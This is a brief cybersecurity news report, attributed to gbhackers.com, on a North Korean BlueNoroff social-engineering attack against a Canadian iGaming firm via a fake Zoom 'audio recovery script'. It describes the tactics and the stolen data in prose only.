A Canadian iGaming company has reportedly fallen victim to a targeted cyberattack carried out by BlueNoroff — a subunit of North Korea’s Lazarus Group. The breach occurred on May 28 during what appeared to be a routine Zoom call with a known business contact.

During the call, an employee was convinced to run a so-called “audio recovery script” to resolve technical issues. The file, in fact, contained malware that initiated unauthorized data collection and system infiltration.

Fake Domains and Social Engineering

The attackers used convincing impersonations of both Zoom technical support and trusted business contacts. They also relied on fake domains such as zoom-tech[.]us to build credibility. Once the malicious code was executed, it began harvesting system data, browser credentials — particularly from crypto-friendly browsers like Brave — and Telegram session information.

The stolen data was exfiltrated via remote shell commands using curl, enabling deeper control of the infected device and maintaining persistence.

Financial Motives and Past Targets

BlueNoroff is known for targeting financial institutions and cryptocurrency firms as part of broader revenue-generation campaigns linked to the North Korean regime. The group has previously been tied to high-profile breaches, including attacks on Bybit and the Ronin Network linked to Axie Infinity.

Investigators suggest that the group’s latest focus on iGaming operators highlights a growing overlap between gambling and crypto-related threat vectors.

Source: https://gbhackers.com/bluenoroff-hackers-exploit-zoom-app-to-deploy-infostealer-malware/